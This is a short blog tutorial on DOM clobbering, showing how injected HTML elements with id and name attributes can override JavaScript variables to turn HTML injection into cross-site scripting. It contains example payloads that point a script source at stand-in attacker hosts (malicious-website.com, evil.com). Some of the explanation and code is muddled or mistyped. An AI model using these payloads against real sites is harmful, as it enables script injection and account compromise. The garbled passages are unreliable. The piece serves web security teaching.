DOM Clobbering
DOM clobbering is a technique to escalate HTML injection to XSS which has a high impact.
Note: DOM clobbering a niche technique, to understand it you should have basic knowledge of DOM, HTML, and JavaScript. This blog explains only about DOM clobbering you can learn the basics of DOM, HTML, and JavaScript through these links:
https://en.wikipedia.org/wiki/Document_Object_Model
HTML Collection:
HTML is a very lenient language, browsers make sure the code is error-free ( up to an extent ). For example, the browser automatically closes all the tags that were left open
Actual code by developer :
<h1>Page not found 404 error
<a href=”/” >go back to home page</a>
Code while being executed in the browser :
<h1>Page not found 404 error
<a href=”/”>go back to home page</a>
</h1>
This is one of the reasons HTML is considered very easy to learn, unlike C or C++ which are very sensitive.
Similar to the above example HTML has a feature called HTML collection,
The
HTMLCollectioninterface represents a generic collection (array-like object similar toarguments) of elements (in document order) and offers methods and properties for selecting from the list.
Each element can be referenced like an array element ( collectionName[0], collectionName[1] )
HTMLCollection also exposes its members directly as properties by both name and index. HTML IDs may contain : and . as valid characters, which would necessitate using bracket notation for property access.
For example, assuming <form id=”myForm”> is present in the document :
var elem1, elem2;
// document.forms is an HTMLCollection
elem1 = document.forms[0];
elem2 = document.forms.item(0);
alert(elem1 === elem2); // shows: "true"
elem1 = document.forms.myForm;
elem2 = document.forms.namedItem("myForm");
alert(elem1 === elem2); // shows: "true"
elem1 = document.forms["named.item.with.periods"];DOM Clobbering :
Now imagine there is a website in which we found an HTML injection with id and name attributes whitelisted but we want an XSS How could that be done?
What will happen if we inject <form id=”myForm”><input id=”input1”> on a website that uses the code snippet from the previous topic?
The elem1 variable will contain <form id=”myForm”><input id=”input1”> not <form id=”myForm”>, we have successfully injected our code to JavaScript context in which we can execute arbitrary JavaScript thus leading to Cross-Site Scripting.
Now let us look at another example with the assumption that we have an HTML injection vulnerability:
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement(‘script’);
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
Code is quite simple, someObject variable contains an HTML element with id “sameObject” and url property of sameObject variable is used as src for the script tag.
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
By using the above payload we override the someObject which gives control to url property, we can change the url to a website we control and execute our own code.
Let us try another example :
var script = window.document.createElement(“script”);
script.async = false;b.src = window.testLocation.protocol + “//” +
window.testLocation.host + “/dist/rtv/” +
pluginName + “.js”;document.head.appendChild(b);
Here we have to overwrite protocol property and leave others empty, payload would be:
<a id=”testLocation”></a>
<a id=”testLocation” name=”protocol”
href=”https://evil.com/"></a>
If you can understand and reproduce this, congratulations you just hacked Gmail. Yes, this was a bug reported by a security researcher in 2019.
https://research.securitum.com/xss-in-amp4email-dom-clobbering/
This blog is a short summary of DOM clobbering and if you wish to learn more, visit the following links:
https://portswigger.net/web-security/dom-based/dom-clobbering
https://portswigger.net/research/dom-clobbering-strikes-back
спасибо :) — Mudhalai Mr DSC SASTRA DEEMED UNIVERSITY
